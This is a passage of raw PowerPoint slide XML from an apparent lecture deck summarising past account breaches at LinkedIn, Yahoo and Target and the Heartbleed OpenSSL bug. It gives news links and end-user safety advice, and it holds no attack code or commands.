              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See Wired Article on Domain Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.wired.com/threatlevel/2012/10/dkim-vulnerability-widespread/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3"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473075" y="152400"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Account Breaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14234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808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93E97A2-EE38-4FB7-9563-16B92EE612E0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80900" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="787400"/>
            <a:ext cx="8229600" cy="5232400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In June 2012, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> announced hackers stole more than 6 million customer passwords, which had been only lightly encrypted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A Russian hacker claimed he stole the 6,458,00 encrypted passwords (cryptographic hashes) and posted them online (without username) to prove his feat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>LinkedIn apparently did not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (use random bits) their password file, but instead used a single iteration of SHA-1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Yahoo breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In July 2012, Yahoo confirmed that 400,000 usernames and passwords had been stolen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The compromised Yahoo accounts belonged to Yahoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s Contributor Network, an online platform to share video, audio and slide shows, also known as Yahoo Voices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A group of hackers, know as D33D Company, posted the names and passwords of 453,492 accounts belonging to Yahoo, Gmail (106,000),  AOL (25,000), Hotmail (55,000) and 6 other providers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The breach was the result of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>union-based SQLK injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> attack as reported by D33D.</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See Yahoo Breach Extends Beyond Yahoo to Gmail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bits.blogs.nytimes.com/2012/07/12/yahoo-breach-extends-beyond-yahoo-to-gmail-hotmail-aol-users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, and</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LinkedIn Suffers Data Breach</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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.reuters.com/article/2012/06/06/linkedin-breach-idINL1E8H6CBC20120606</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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Account Breaches (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14234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819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B6C9243-226A-44EA-B26F-9B278EE666B7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>TARGET breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>On December 18, 2013, security expert Brian Krebs broke the news that Target was investigating a major data breach potentially involving millions of customers credit and debit card records. Target confirmed that the hack took place between November 27 and December 15, 2013. Target initially disclosed that up to 40 million consumer credit and debit cards may have been compromised: hackers gained access to customer names, card numbers, expiration dates, CVV codes, and PIN data. On January 14, 2014,  Target disclosed that also names, addresses, phone numbers and email addresses had been stolen for up to 110 million customers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Target had been notified of a possible breach by the FireEye security service, but did not act to prevent the theft from being carried out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A 17-year old Russian teen was suspected to be the author of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>BlackPOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, which was used by others to attack the Windows computers used by Target.  Another 23-year old Russian, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Rinat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Shabayev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> claimed to be the malware author.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The Target breach is thought to be the largest, most lucrative breach that has happened to date. </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See</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	Target Breach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://krebsonsecurity.com/2013/12/sources-target-investigating-data-breach/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> and more on Target Breach</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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://business.time.com/2014/01/20/russian-teen-suspected-as-author-of-target-hacking-code/</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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Account Breaches (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14234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829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B224D59-CBCE-43DB-AFEE-42D7AB413B52}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Heartbleed Bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The Heartbleed Bug is a serious vulnerability in the popular, open-source, OpenSLL cryptographic software library.  This weakness allows stealing the information protected by SSL/TLS encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The Heartbleed bug allows anyone on the Internet to read the memory  of systems protected by the vulnerable version of OpenSSL. The bug is called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> because it is a bug in the implementation of the TSL/DTLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>heartbeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> extension (RCF 6520). The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Versions  of OpenSSL 1.0.1 (introduced in December 2011) through 1.0.1f are vulnerable.  OpenSSL Version 1.0.1g, released on April 7, 2014,  fixes the bug. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Open source web servers like Apache and nginx are affected, as many implementations use OpenSSL for SSL/TLS transactions.  Versions of Linux (Debian, Ubuntu, CentOS, Fedora, SUSE) are affected, as well as FreeBSD and OpenBSD.  Apple Mac OS X and iOS are not affected as they do not use OpenSSL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>End users are encouraged to do all of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Change passwords and turn on two-step verification, if available. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Be wary of public Wi-Fi networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Monitor recent account activity.</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See</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://heartbleed.com/</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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://online.wsj.com/news/articles/SB10001424052702303873604579495362672447986</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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://filippo.io/Heartbleed/</a:t>
